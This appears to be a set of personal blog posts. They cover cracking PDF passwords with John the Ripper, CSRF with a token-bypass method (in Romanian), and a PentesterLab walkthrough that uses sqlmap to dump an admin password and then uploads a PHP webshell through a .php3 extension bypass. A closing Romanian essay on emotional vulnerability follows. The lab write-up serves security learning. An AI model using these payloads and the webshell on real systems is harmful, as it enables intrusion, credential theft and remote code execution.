How to crack the password on a PDF file?

Once in a while you need to do this (in CTFs, not real life lol) .. so the easiest way is to install john the ripper ( https://www.openwall.com/john/ , i recommend the jumbo edition) and use its utility called pdf2john to extract the hash needed for john to crack:

PATH_TO/pdf2john.pl password-protected.pdf > pdf.john

Then start john and happy cracking 🙂

For the dictionary attack you can use the best list I ever saw (2019): https://github.com/danielmiessler/SecLists/tree/master/Passwords

Example with one of the files from the above repository:

john –wordlist=PATH_TO_DICTIONARY pdf.john

or for a brute-force approach

john –incremental:ASCII pdf.john

Good luck!

Simple, no? 🙂


PS: This cheat-sheet really helps: https://www.nekhbet.ro/wp-content/2019/09/jtr-cheat-sheet.pdf

CSRF – Cross-Site Request Forgery (one-click attack or session riding)

E un tip de atac web prin care comenzi neautorizate sunt executate in numele unui utilizator (fara ca acesta sa-si dea seama, ca daca si-ar da seama .. cine il opreste sa le faca chiar el? 🙂 ).

Ca sa se poata executa este nevoie ca atacatorul sa cunoasca sistemul pe care victima este autentificata.

Exemplu de atac: eu, ca si victima, sunt autentificat pe acest blog si atacatorul Ion stie asta si stie si ca vizitez blogul lui Gheorghe. Ion a gasit o bresa de securitate in blogul lui Gheorghe, sa zicem un XSS stored pe care il introduce ca si comentariu in ultimul articol (stie ca eu il voi citi) si atunci cand eu intru pe site, acel stored XSS se va executa. Payload-ul poate sa fie pur si simplu un request GET catre o pagina care face un anumit lucru.

Ce solutii se recomanda in protejarea asupra acestui tip de atac:

CSRF tokens .. fiecare actiune se face printr-un POST, unul dintre campuri e un token generat la generarea paginii. In cod se verifica daca tokenul generat e acelasi cu cel stocat/generat. Cum se face bypass .. simplu, ca si orice scraper de ASP (care are ca si CSRF token un camp numit viewState), facem un GET, luam tokenul, apoi facem requestul nostru POST cu acel token.
Exemplu: https://digi.ninja/blog/xss_steal_csrf_token.php

To be continued …

PentesterLab – From SQL Injection to Shell

https://pentesterlab.com/exercises/from_sqli_to_shell/course

Note: there are tons of methods to solve it 🙂 I tried the fastest one. Doing everything by “hand” (no tools) will bring the best learning experience, of course.

We have the VM .. now what?

Find its IP :))
Start it, then go to the host and:
nmap -v 10.42.0.* -p 80

Nmap scan report for 10.42.0.6
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

(the VM was set with bridged adapter).

Open it in the browser now. Clicking around will show us a first GET parameter: http://10.42.0.6/cat.php?id=1

Playing with it (add ‘ for example after 1) will generate the known SQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

What does that tell us? 😀 .. sqlmap
(of course we can run sqlmap -a -u URL for everything) but for the sake of the exercise lets see it step by step):

sqlmap –tables -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:59:27

[08:59:27] [INFO] resuming back-end DBMS 'mysql' 
[08:59:27] [INFO] testing connection to the target URL
[08:59:27] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[08:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[08:59:27] [INFO] fetching database names
[08:59:27] [INFO] fetching tables for databases: 'information_schema, photoblog'
Database: photoblog
[3 tables]
+---------------------------------------+
| categories                            |
| pictures                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[08:59:27] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 08:59:27

Yuppy, we can the ‘users’ table 🙂 .. lets go for an account.

sqlmap –dump photoblog -u http://10.42.0.6/cat.php?id=1

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:02:52

[09:02:52] [INFO] resuming back-end DBMS 'mysql' 
[09:02:52] [INFO] testing connection to the target URL
[09:02:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[09:02:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[09:02:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:02:52] [INFO] fetching current database
[09:02:52] [INFO] fetching tables for database: 'photoblog'
[09:02:52] [INFO] fetching columns for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: pictures
[3 entries]
+----+-------------+-----+---------+
| id | img         | cat | title   |
+----+-------------+-----+---------+
| 1  | hacker.png  | 2   | Hacker  |
| 2  | ruby.jpg    | 1   | Ruby    |
| 3  | cthulhu.png | 1   | Cthulhu |
+----+-------------+-----+---------+

[09:02:52] [INFO] table 'photoblog.pictures' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/pictures.csv'
[09:02:52] [INFO] fetching columns for table 'users' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'users' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
[09:02:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:02:57] [INFO] using hash method 'md5_generic_passwd'
[09:02:57] [INFO] resuming password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2' for user 'admin'
[09:02:57] [INFO] postprocessing table dump
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[09:02:57] [INFO] table 'photoblog.users' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/users.csv'
[09:02:57] [INFO] fetching columns for table 'categories' in database 'photoblog'
[09:02:57] [INFO] fetching entries for table 'categories' in database 'photoblog'
[09:02:57] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: categories
[3 entries]
+----+--------+
| id | title  |
+----+--------+
| 1  | test   |
| 2  | ruxcon |
| 3  | 2010   |
+----+--------+

[09:02:57] [INFO] table 'photoblog.categories' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/categories.csv'
[09:02:57] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 09:02:57

So the account is admin / P4ssw0rd. (md5, no salt)

Note: if sqlmap can’t break the password, use the online tools OR https://github.com/Talanor/findmyhash or whatever else you prefer.

After logging in to the admin side we see an upload field here: http://10.42.0.6/admin/new.php so .. that tells us how to get to the shell .. by uploading a script (webshell).
The easiest one, considering we are running Apache + PHP is .. using exec/passthru/system, whatever you like 🙂

<?php passthru ($_REQUEST['cmd']); ?>

But we will see that it doesn’t allow .php files to be uploaded so try with .php3, .php5 and then access it with the GET/POST parameter payload you want, example:

http://10.42.0.6/admin/uploads/ffff.php3?cmd=whoami

For nicer webshells, check this one out:

https://github.com/epinna/weevely3

No small talk #6 – Vulnerabilitatea

Ganduri, raw, nefiltrate, necorectate, ne nicicum 🙂


In ziua de azi totul pare sa tinda spre pozitivism absolut .. orice faci, ca adult, TREBUIE sa fie bine, sa fie perfect, pozitiv, sa poti posta fericit pe facebook lucrurile care arata asta. Orice postare motivationala atrage o ploaie de likeuri. Orice traire negativa trebuie ignorata, viata e doar roz, trebuie sa vedem doar partea pozitiva INTOTDEAUNA.

Pentru mine, personal, toate astea sunt iluzii, o frica de a fii vulnerabil, de a incerca sa ne impunem sa fim fericiti pana ajungem sa credem asta, sa ne rescriem superficial viziunea si perspectiva vietii.

Dar oare .. viata e doar roz? sau incercam efectiv sa bagam sub pres emotiile negative, tristetea, teama, depresia, frica, stresul? Si cand presul se tot ridica centrimetru cu centimetru ce facem? Unde il golim? Cum refulam? Prin mai multa minciuna? (ne mintim pe noi si pe ceilalti) sau?

Problema pare sa fie .. ca in ziua de azi ne lipseste curajul de a fi vulnerabili si suprimam continuu aceasta vulnerabilitate. Nu trebuie sa fim eroi ci doar sa ne asumam aceasta vulnerabilitate, aceste lucruri “negative” si sa le integram in noi, sa le acceptam si primim asa cum vin ele.

Multi oameni nu fac nimic de frica acestei vulnerabilitati .. si eu eram la fel .. mergeam la evenimente si se dansa, eu nu stiu sa dansez .. de ce sa dansez? Sa par prost? Nah mai bine stau in banca mea! Asta e doar un exemplu minor de auto-limitare din pricina vulnerabilitatii. Altul .. s-a terminat programul la lucru .. nu plec eu primul pentru ca … motiv X.

Cred ca insasi procesul de evolutie pe toate planurile se bazeaza pe greseli mai mult decat pe succese.
Ca sa fiu ca si Dan .. exemple .. (legenda, doh) Edison a esuat de 999 de ori in incercarea de a inventa becul si intrebat de un ziarist de ce nu a renuntat daca a esuat de atatea ori el a raspuns ca nu a esuat ci a gasit 999 de metode prin care nu au mers.

Durerea, frica, tristetea etc par negative dar sunt oare asa lipsite de sens?

Intrebari de grup:

1) Ce parere aveti despre ce am zis? Scurt in cateva cuvinte clare, nu povesti! Multumesc!

2) O singura intamplare din ultima luna cand te-ai simtit vulnerabil. Crezi ca poti trece peste aceasta vulnerabilitate? Ce idei ai?